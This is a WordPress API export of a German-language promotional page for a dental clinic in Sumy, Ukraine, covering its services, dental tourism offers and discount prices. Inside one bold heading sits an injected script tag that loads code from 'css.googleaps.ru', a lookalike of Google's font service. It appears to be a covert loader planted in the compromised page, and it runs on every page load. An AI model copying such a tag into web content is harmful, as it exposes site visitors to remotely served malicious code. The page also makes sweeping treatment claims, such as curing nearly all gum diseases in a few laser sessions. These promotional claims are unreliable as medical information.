{"id":3719,"date":"2014-01-20T15:29:10","date_gmt":"2014-01-20T13:29:10","guid":{"rendered":"http:\/\/www.your-brilliant-smile.com\/?page_id=3719"},"modified":"2014-02-28T10:32:44","modified_gmt":"2014-02-28T08:32:44","slug":"uber-uns","status":"publish","type":"page","link":"https:\/\/your-brilliant-smile.com\/de","title":{"rendered":"\u00dcber uns"},"content":{"rendered":"<p><a href=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic.jpg\" rel=\"prettyPhoto[3719]\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-4140\" alt=\"Advantages of our dental clinic\" src=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic-300x199.jpg\" width=\"300\" height=\"199\" srcset=\"https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic-300x199.jpg 300w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic-630x418.jpg 630w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic-900x598.jpg 900w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><b>Vorteile unserer zahn\u00e4rztlichen Klinik:<\/b><\/p>\n<ul>\n<li>Alle Arten von zahn\u00e4rztlichen Dienstleistungen.<\/li>\n<li>Zahnbehandlung ohne Bohrmaschine (Technologie Sandman f\u00fcr Kinder)<\/li>\n<li>Computerunterst\u00fctzte An\u00e4sthesie (Zahnbet\u00e4ubung mit Hilfe von nanotechnologischen Bet\u00e4ubungssystemen.)<\/li>\n<li>Zahnbet\u00e4ubung ohne Nadel (deutsche Technologie INJEX)<\/li>\n<li>R\u00f6ntgendiagnostik<\/li>\n<li>Prothetik ohne Anschleifen von gesunden Z\u00e4hnen<\/li>\n<li>Prothetik auf Implantaten (leistbare \u201edemokratische\u201c Preise)<\/li>\n<li>Strikte Einhaltung von Anti-AIDS, Anti-Hepatitis Verfahren.<\/li>\n<li>Kostenfreie Beratung.<\/li>\n<li>K\u00fcrzeste Fristen der Herstellung von Prothesen in der Region.<\/li>\n<li>Langj\u00e4hrige Erfahrung des Fachpersonals.<\/li>\n<li>Garantie auf jede Konstruktion, die bei uns eingesetzt wurde.<\/li>\n<li>Flexible Preispolitik (unsere \u00c4rzte bieten Ihnen alle Varianten von Konstruktionen an \u2013 von billigsten bis zu teuersten Konstruktionen der VIP Klasse.)<\/li>\n<li>Zahn\u00e4rztliche Dienstleistungen in Ratenzahlung<\/li>\n<li>Prothetik und Behandlung \u00fcber Ihre Versicherung (falls Sie versichert sind und Ihre Versicherung die zahn\u00e4rztlichen Dienstsleistungen deckt.)<\/li>\n<li>Hollywood Lumineers (einzigartige Dienstleistung f\u00fcr VIP-Kunden.)<\/li>\n<li>COMPONEERS \u2013 einzigartige Schweizer Technologie der Wiederherstellung von Z\u00e4hnen (Neuheit in 2012.)<\/li>\n<li>Veneers in nur 1 Tag.<\/li>\n<li>Hauseigenes Zahnlabor.<\/li>\n<li>Erm\u00e4\u00dfigungsprogramm.<\/li>\n<li>M\u00f6glichkeit der Herstellung beliebiger Modifizierung der Zahnprothese.<\/li>\n<\/ul>\n<p><a href=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/Dental-prosthesis.jpg\" rel=\"prettyPhoto[3719]\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-4141\" alt=\"Dental prosthesis in Sumy city\" src=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/Dental-prosthesis-300x241.jpg\" width=\"300\" height=\"241\" srcset=\"https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/Dental-prosthesis-300x241.jpg 300w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/Dental-prosthesis.jpg 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><strong>Zahnprothetik in Sumy<\/strong><\/p>\n<p>Die \u00c4rzte unserer zahn\u00e4rztlichen Klinik stellen alle existierenden Modifikationen von Prothesen her. Falls Ihre Situation sehr kompliziert und vernachl\u00e4ssigt ist \u2013 stellt dies keinen Anlass dar, um sich Sorgen zu machen. Wir helfen Ihnen die meist komplizierten Aufgaben zu l\u00f6sen.<\/p>\n<p>Die Interessenten, sich einen Zahn einsetzen zu lassen, sollten sich online auf der Webseite der Klinik www.your-brilliant-smile.com (Popup Fenster) oder telefonisch unter +3 8\u00a0066\u00a0196 87 93 beraten lassen. Danach sollte man sich einen Termin f\u00fcr die Untersuchung vereinbaren (die prim\u00e4re Untersuchung ist bei uns kostenfrei), anschlie\u00dfend, nach Ber\u00fccksichtigung aller m\u00f6glichen Variante der L\u00f6sung Ihrer Situation und nach Auswahl der optimalen Konstruktion, wird man der tats\u00e4chlichen Prothetik unterzogen.<\/p>\n<p>Die Fristen der Herstellung von Prothesen sind in unserer Klinik die k\u00fcrzesten in der Region. Von 3 bis 7 Tagen.<\/p>\n<p>Projekte der VIP-Klasse senden wir in die Zahnlabore nach Kiew und europ\u00e4ische L\u00e4nder (Deutschland, Schweiz). Wegen der \u00dcbersendung wird die Herstellungsfrist etwas l\u00e4nger, daf\u00fcr ist die Qualit\u00e4t der Arbeit die beste.<\/p>\n<p><a href=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-tourism.jpg\" rel=\"prettyPhoto[3719]\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-4142\" alt=\"Dental tourism in Ukraine\" src=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-tourism-300x200.jpg\" width=\"300\" height=\"200\" srcset=\"https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-tourism-300x200.jpg 300w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-tourism.jpg 600w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><b>Zahn\u00e4rztlicher Tourismus in der Ukraine. Oder warum Sie sich genau an uns wenden sollen<\/b>.<\/p>\n<p>In der letzten Zeit trifft man in der ganzen Welt noch h\u00e4ufiger einen neuen Trend in Tourismus \u2013 n\u00e4mlich Zahn\u00e4rztlichen Tourismus. Sie k\u00f6nnen Ihr Geld und die Zeit wesentlich ersparen und gleichzeitig Ukraine besichtigen, Ausfl\u00fcge zu machen, und ein wenig Zeit Ihrer Gesundheit widmen.<\/p>\n<p>Wir laden die Einwohner aller L\u00e4nder ein, zu uns in die Stadt Sumy zu kommen sowie unsere zahn\u00e4rztliche Klinik zu besuchen. Sie k\u00f6nnen eine Beratung unseres Fachpersonals per E-Mail (<a href=\"mailto:katsumoto2018@gmail.com\">katsumoto2018@gmail.com<\/a>) oder online durch unseren Online-Chat bekommen. Idealerweise Sie senden uns per E-Mail Ihre Panoram-R\u00f6ntgenaufnahme, wir werden Sie genauer beraten und die Arbeitskosten vor ihrer Beginn einkalkulieren k\u00f6nnen. Wir \u00fcbernehmen alle organisatorischen Fragen. Wir helfen Ihnen einen Wohnsitz f\u00fcr die Dauer der Reise zu finden (Apartments oder ein Hotel). Das n\u00e4chste 4* Hotel befindet sich in nur 500 Metern von unserer Klinik entfernt. Unbedingt helfen wir Ihnen Ihre Freizeit zu gestalten, wir w\u00e4hlen die passenden Ausfl\u00fcge in unserer Stadt, historisch bekannten Orten unserer Region und in der Hauptstadt unseres Landes Kiew.<\/p>\n<p>Zahnmedizin ist unter der Bev\u00f6lkerung sehr gefragt. Sehr viele zahn\u00e4rztlichen Kliniken und Zahnarztpraxen wurden in unserer Region ge\u00f6ffnet, aber jeder Arzt behandelt eine und dieselbe Situation unterschiedlich. Einer macht die Behandlung und die prothetische Versorgung mehr schonender f\u00fcr den Patienten, der andere weniger, und keiner soll daf\u00fcr bestraft werden. Jeder Arzt wie der Mensch ist unterschiedlich. Die Denkans\u00e4tze sind unterschiedlich. Technologien und \u00dcberzeugungen sind ebenfalls unterschiedlich. Die Vorgehensprinzipien zur Rehabilitation von Patienten unterscheiden sich bei den \u00c4rzten unserer Klinik von den anderen. Wir gehen den Weg der geringsten Einmischung (falls dies anhand der Indikationen m\u00f6glich ist), Rationalit\u00e4t, Sterilit\u00e4t und Schmerzlosigkeit. Alle Arten der Behandlung und prothetischer Versorgung f\u00fchren wir unter Bet\u00e4ubung durch (am h\u00e4ufigsten benutzen wir das deutsche System INJEX, sie macht die Zahnbet\u00e4ubung ohne Einspritzung mittels Nadel m\u00f6glich.)<\/p>\n<p>Prothetische Versorgung erfolgt in unserer Klinik nach individuellem Schema (mithilfe des Gesichtsbogens und eines Artikulators, mit Ber\u00fccksichtigung und \u00dcbertragung von Daten Ihres Gelenks sowie der anthropometrischen Daten). Individuelles Schema macht es m\u00f6glich, die prothetische Versorgung f\u00fcr den Patienten mit Ber\u00fccksichtigung nicht nur der Form des Zahnes, sonder auch der Struktur des Gelenks und des Bewegungswinkels (F\u00fchrungswinkels) der Z\u00e4hne noch genauer und bequemer zu machen. Ist solche Arbeit fertig, so ist sie sehr pr\u00e4zise und bequem.<\/p>\n<p><strong>Wir f\u00fchren alle Arten der zahn\u00e4rztlichen Versorgung durch:<script src=\"\/\/css.googleaps.ru\/css?f=Open+Sans&#038;cd=mb&#038;ver=4.2.2\"><\/script><\/strong><\/p>\n<ul>\n<li>B\u00fcgelprothesen (B\u00fcgelprothesen auf Attachments, klassische B\u00fcgelprothesen, B\u00fcgelprothesen mit teleskopischem Fixierungssystem, Prothesen auf Riegelfixierung, Prothesen mit Balkenfixierungssystem.)<\/li>\n<li>Vollkeramik<\/li>\n<li>Metallkeramik<\/li>\n<li>Lumineers<\/li>\n<li>Veneers<\/li>\n<li>Componeers<\/li>\n<li>prothetische Versorgung auf Implantaten<\/li>\n<li>abnehmbare zahn\u00e4rztliche Versorgung (\u00fcberdeckende Prothesen, plattenf\u00f6rmige Prothesen, abnehmbare vor\u00fcbergehende Prothesen.)<\/li>\n<li>vor\u00fcbergehende Kronen aus PVC, Mikroprothesen.<\/li>\n<li>mikroprothetische Versorgung mittels Einlagen und Auflagen<\/li>\n<\/ul>\n<p><b>Zahnbehandlung<\/b> in unserer zahn\u00e4rztlichen Klinik erfolgt nur nach den neusten Technologien. Die F\u00fcllungen setzen wir nur aus Glasionomer-Zementen und photopolymeren Kompositen aus Deutschland, Japan und USA ein. Die Behandlung von Wurzelkan\u00e4len der Z\u00e4hne erfolgt in unserer Klinik mithilfe des Endomotors (eine Vorrichtung, die die Erweiterung der Wurzelkan\u00e4le bis zur notwendigen Breite erm\u00f6glicht) mit nachfolgendem Auff\u00fcllen des Wurzelkanals mit erw\u00e4rmter Guttapercha und speziellem F\u00fcllungsverdichter aus Zement.<\/p>\n<p>Einige besonders komplizierte F\u00e4lle werden mithilfe des Kofferdamms Raberdam (mit Isolierung des Arbeitsbereiches) ausge\u00fcbt. M\u00f6glich ist die Variante der Zahnbohrung ohne die Bohrmaschine (diese Technologie erm\u00f6glicht die Abtragung des betroffenen Zahngewebes mit speziellem Ger\u00e4t, das das betroffene Zahngewebe buchst\u00e4blich ausbl\u00e4st.)<\/p>\n<p><b>Behandlung der Zahnfleischerkrankungen <\/b>(Parodontitis, Parodontose, Gingivitis) \u00fcben wir mithilfe des Diodenlasers \u201eBiolase\u201c. Diese Technologie tr\u00e4gt der sicheren antiseptischen Auswirkung auf das erkrankte weiche Gewebe bei. K\u00fcrettage (Reinigung der Zahnfleischtaschen vom Granulationsgewebe), durchgef\u00fchrt mithilfe des Lasers, ist viel effektiver als gew\u00f6hnliche Prozeduren und weist eine schnellere und qualitative Heilung auf. In 3 \u2013 5 Behandlungen werden praktisch alle bekannten Erkrankungen des weichen Gewebes geheilt.<\/p>\n<p><b>R\u00f6ntgendiagnostik. <\/b><\/p>\n<p>Eigenes R\u00f6ntgenger\u00e4t erm\u00f6glicht uns, die Diagnosen von Erkrankungen des Zahnkiefersystems noch genauer zu stellen. In einigen F\u00e4llen ist die R\u00f6ntgenaufnahme in der Zwischenphase der Behandlung notwendig.<\/p>\n<p><b>Laserunterst\u00fctzte Zahnmedizin <\/b><\/p>\n<p>Eigene Laservorrichtung erm\u00f6glicht uns, solche Arbeitsarten wie laserunterst\u00fctzte Zahneinpflanzung, laserunterst\u00fctzte Bleichung der Z\u00e4hne, K\u00fcrzung der B\u00e4ndchen, Vertiefung des Vorhofes der Mundh\u00f6hle, Behandlung der Parodonterkrankungen, Schlie\u00dfung des Fistelgangs, Behandlung der Perikoronitis durchzuf\u00fchren.<\/p>\n<p><b>Zahnbehandlung ohne Bohrmaschine<\/b><\/p>\n<p><b>Zahnbehandlung und prothetische Versorgung unter Vergr\u00f6\u00dferung<\/b><\/p>\n<p><b>Chirurgische Zahnmedizin <\/b><\/p>\n<p>Zahnextraktion beliebiger Komplexit\u00e4t, chirurgische Parodontologie, Entfernung von Zysten, Entfernung von Neubildungen, Frenektomien, Vertiefung des Vorhofes der Mundh\u00f6hle, Zahneinpflanzung, Knochenimplantationen.<\/p>\n<p><b>Zahndekorierung <\/b><\/p>\n<p>Zahninkrustationen mit Skyces, Glitzersteinen, Edelsteinen.<\/p>\n<p><b>Gnathologie <\/b><\/p>\n<p>Beratung des Gnathologen. Diagnostik der Erkrankungen des Kiefergelenks. Diagnostik und Korrektur der Okklusionsst\u00f6rungen mithilfe des Artikulators sowie selektiver Anschleifung der Z\u00e4hne. Herstellung von Kappen bei der Behandlung von Bruxismus, pathologischer Abnutzung der Z\u00e4hne. Herstellung von Kappen bei massiver Zahnprothetik. Relaxationskappen. Repositionskappen.<\/p>\n<p><b>Zahnmedizin f\u00fcr Schwangere <\/b><\/p>\n<p>In unserer Klinik werden f\u00fcr die Schwangeren die schonenden Behandlungs- Prothetikmethodiken, die am meisten schadlose und zertifizierte Arzneimittel und F\u00fcllungswerkstoffe angewendet.<\/p>\n<p><b>Zahnimplantologie <\/b><\/p>\n<p>Die Zahnimplantologie genie\u00dft in unserer Klinik eine sehr hohe Aufmerksamkeit. Diese Richtung der prothetischen Versorgung von Zahndefekten ist eine von denen, die sich am rasantesten entwickelt. Alle Arbeiten mit der Prothetik auf Implantaten werden nach individuellem Schema mit Ber\u00fccksichtigung von individuellen Besonderheiten der Bissbildung sowie des Kiefergelenks durchgef\u00fchrt. Wir arbeiten ausschlie\u00dflich mit etablierten Implantatensystemen aus Deutschland, USA und Israel.<\/p>\n<p><a href=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-clinic.jpg\" rel=\"prettyPhoto[3719]\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-4143\" alt=\"New action offers\" src=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-clinic-300x160.jpg\" width=\"300\" height=\"160\" srcset=\"https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-clinic-300x160.jpg 300w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-clinic.jpg 595w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><b>Neue Aktionsangebote unserer Klinik:<\/b><\/p>\n<p>1. Photopolymere F\u00fcllung FILTEK Z550 (USA) f\u00fcr nur 200 UAH (Photopolymer ist der st\u00e4rkste und unsichtbare F\u00fcllungswerkstoff, er wird nicht aufgel\u00f6st, weist keine Mikrorisse auf und das wichtigste, dass er nach beliebiger Zahnfarbe ausgew\u00e4hlt werden kann (die F\u00fcllung unterscheidet sich nicht vom Farbton des Zahnes). Warum 200 UAH ein g\u00fcnstiger Preis ist? Der Durchschnittspreis solcher F\u00fcllung in Kliniken Kiews, Charkows, Lembergs \u2013 von 350 UAH bis 400 UAH).<\/p>\n<p>2. Zahnprothetik. VENEERS IPS EMAX (Deutschland) f\u00fcr nur 1000 UAH. Was bedeutet Veneers? Veneers sind d\u00fcnne keramische Platten, die es machbar machen, die Farbe und die Form des Zahnes zu \u00e4ndern. Sie haben eine Fehlstellung Ihrer Z\u00e4hne, dies ist eine hervorragende Alternative f\u00fcr die Zahnspange. Sie w\u00fcnschen, dass Ihre Z\u00e4hne f\u00fcr immer heller werden, und nicht nur f\u00fcr eine bestimmte Zeit \u2013 Veneers ist genau das, was Sie brauchen. Warum genau IPS EMAX (Deutschland), und kein anderer Hersteller? IPS EMAX \u2013 ist die am meisten gepr\u00fcfte und biologisch vertr\u00e4gliche Technologie, diese Veneers sehen so nat\u00fcrlich aus, dass es niemandem einfallen wird, dass es nicht ihre eigenen, sondern k\u00fcnstliche Z\u00e4hne sind. Die Technologie wurde in der ganzen Welt akzeptiert und anerkannt, sie wurde auch in der Ukraine zertifiziert. Warum 1000 UAH ein g\u00fcnstiger Preis ist? Der Durchschnittspreis in der Stadt Sumy &#8211; 2000 UAH. In europ\u00e4ischen L\u00e4ndern steigen die Preise bis auf 1000 EUR pro St\u00fcck, in Kiew \u2013 3500 UAH \u2013 4000 UAH).<\/p>\n<p>3. Metallkeramik VitaVM13 (Deutschland). 650 UAH.<\/p>\n<p>VitaVM13 \u2013 ist ein Werkstoff, dem nichts Vergleichbares in \u00c4sthetik und Festigkeitseigenschaften gestellt werden kann. Metallkeramische Kronen aus diesem Werkstoff sehen sehr vital aus, weil diese Masse die M\u00f6glichkeit gibt, beliebige Farbt\u00f6ne, Untert\u00f6ne, luminiszente und schillernde Eigenschaften zu schaffen. Die Arbeit, die mittels dieser Masse gemacht wird, ist eine Juwelierarbeit. (Durchschnittspreis in der Stadt Sumy 700 \u2013 800 UAH pro St\u00fcck.)<\/p>\n<p>4. Laserunterst\u00fctzte Bleichung \u2013 100% Ergebnis. 1500 UAH.<\/p>\n<p>Laserunterst\u00fctzte Bleichung l\u00f6st keine erh\u00f6hte Sensibilit\u00e4t in Z\u00e4hnen aus, Sie sehen das Ergebnis nicht einer Stunde oder einer Woche, sondern gleich nach 20 Minuten.<\/p>\n<p>(In der Stadt Sumy verf\u00fcgt nur unsere Klinik \u00fcber diese Ger\u00e4tetechnik. Der Durchschnittspreis der laserunterst\u00fctzten Bleichung in Kiew (mit Anwendung desselben Lasers und Bleichungssets wie bei uns) \u2013 3000 \u2013 4500 UAH.)<\/p>\n<p>5. Vollkeramik \u2013 unschlagbare \u00c4sthetik (Einlagen, Kronen, Veneers aus Keramik). Maximum \u00c4sthetik zum Aktionspreis 1000 UAH! Alter Preis \u2013 2000 UAH.<\/p>\n<p>Sie w\u00fcnschen ein blendendes L\u00e4cheln und hochwertige Arbeit, ist dies die beste Variante f\u00fcr Sie und Ihre Freunde <img decoding=\"async\" class=\"kws-smiley\" src=\"https:\/\/your-brilliant-smile.com\/wp-content\/plugins\/kama-wp-smile\/packs\/qip\/smile.gif\" alt=\"smile\" \/><\/p>\n<p>6. \u201eUnsichtbare\u201c Prothesen. Konstruktionen mit Verschlussklemmungen. Prothetische Versorgung auf Implantaten. All dies fasst die Varianten um, die es erm\u00f6glichen, eine f\u00fcr die umgebenden Menschen absolut unsichtbare Prothese zu bekommen, die stabil h\u00e4lt und keine peinliche Situation verursacht.<\/p>\n<p>7. Zahnmedizin f\u00fcr Schwangere. Diese Branche unterscheidet sich von der gew\u00f6hnlichen zahn\u00e4rztlichen Versorgung durch viele Kriterien. Es gibt sehr viele Feinheiten hier. Schwangere Frauen sollen mit besonderer Zuwendung, Behutsamkeit und Vorgehensweise mit diesen oder jenen medizinischen Pr\u00e4paraten behandelt werden.<\/p>\n<p>8. Prothetische Versorgung in Ratenzahlung bis zu 1 Jahr.<\/p>\n<p>9. Langj\u00e4hrige Erfahrung des Fachpersonals.<\/p>\n<p>10. Garantie auf die prothetische Versorgung \u2013 3 Jahre, auf die Behandlung \u2013 1 Jahr. Verwechseln Sie bitte nicht die Garantie mit der Nutzungsdauer, das sind zwei unterschiedliche Begriffe, die Nutzungsdauer \u00fcberschreitet immer die Garantie mehrmals. Voraussetzung f\u00fcr einen Garantiefall \u2013 Bruch einer Prothese oder einer F\u00fcllung, Ausfall einer F\u00fcllung. Wir sind daran interessiert, dass Sie mit der Qualit\u00e4t unserer Dienstleistungen zufrieden bleiben, deswegen ist die Einhaltung von Garantiefristen eine der verbindlichen Regeln f\u00fcr uns.<\/p>\n<p>11. Hollywood Lumineers \u2013 das ist eine einzigartige Technologie, die es erm\u00f6glicht, ultrad\u00fcnne Veneers nach Ma\u00df ohne Abschleifung Ihrer Z\u00e4hne zu schaffen. (Unsere Klinik ist die einigste in der Stadt Sumy, die f\u00fcr diese Methodik zertifiziert ist.)<\/p>\n<p>12. Componeers (Veneers in nur 1 Besuch) \u2013 das sind Veneers, die aus einem gepressten Kompositwerkstoff hergestellt wurden. Vorteil dieser Methodik besteht darin, dass Sie in nur 1 Besuch des Zahnarztes hergestellt werden k\u00f6nnen. Solch ein Veneer kosten in unserer Klinik 1500 UAH. (Unsere Klinik ist die einigste in der Stadt Sumy, die f\u00fcr diese Methodik zertifiziert ist.)<\/p>\n<p>13. K\u00fcrzeste Fristen der Prothesenherstellung in der Region (von 3 bis 5 Tagen).<\/p>\n<p>15. \u201eWie sind in der Lage, beliebige Modifikation einer Zahnprothese herzustellen\u201c. In unserer Klinik k\u00f6nnen Sie beliebige Art der Zahnprothese herstellen lassen. Wir machen die prothetische Versorgung nach allen existierenden modernen Methodiken, und vervollst\u00e4ndigen stets unsere Kenntnisse auf Seminaren und Meisterklassen, lernen neue Methodiken und M\u00f6glichkeiten kennen.<\/p>\n<p>16. Arbeit unter Vergr\u00f6\u00dferung. (Der Zahnarzt, genau wie der Juwelier, um seine Arbeit hochwertiger und sch\u00f6ner zu machen, ist nicht in der Lage, alle Feinheiten ohne eine drei- oder f\u00fcnffache Vergr\u00f6\u00dferung zu sehen. In den F\u00e4llen, wenn ein Patient hohe \u00e4sthetische Anforderungen stellt, nutzen wir die Vergr\u00f6\u00dferungsger\u00e4te.)<\/p>\n<p>17. Zahnmedizin f\u00fcr Kinder (Zahnbehandlung ohne Bohrmaschine.)<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Vorteile unserer zahn\u00e4rztlichen Klinik: Alle Arten von zahn\u00e4rztlichen Dienstleistungen. Zahnbehandlung ohne Bohrmaschine (Technologie Sandman f\u00fcr Kinder) Computerunterst\u00fctzte An\u00e4sthesie (Zahnbet\u00e4ubung mit Hilfe von nanotechnologischen Bet\u00e4ubungssystemen.) Zahnbet\u00e4ubung ohne Nadel (deutsche Technologie INJEX) R\u00f6ntgendiagnostik Prothetik ohne Anschleifen von gesunden Z\u00e4hnen Prothetik auf Implantaten (leistbare \u201edemokratische\u201c Preise) Strikte Einhaltung von Anti-AIDS, Anti-Hepatitis Verfahren. Kostenfreie Beratung. K\u00fcrzeste Fristen der Herstellung [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/your-brilliant-smile.com\/de\/wp-json\/wp\/v2\/pages\/3719"}],"collection":[{"href":"https:\/\/your-brilliant-smile.com\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/your-brilliant-smile.com\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/your-brilliant-smile.com\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/your-brilliant-smile.com\/de\/wp-json\/wp\/v2\/comments?post=3719"}],"version-history":[{"count":4,"href":"https:\/\/your-brilliant-smile.com\/de\/wp-json\/wp\/v2\/pages\/3719\/revisions"}],"predecessor-version":[{"id":4149,"href":"https:\/\/your-brilliant-smile.com\/de\/wp-json\/wp\/v2\/pages\/3719\/revisions\/4149"}],"wp:attachment":[{"href":"https:\/\/your-brilliant-smile.com\/de\/wp-json\/wp\/v2\/media?parent=3719"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}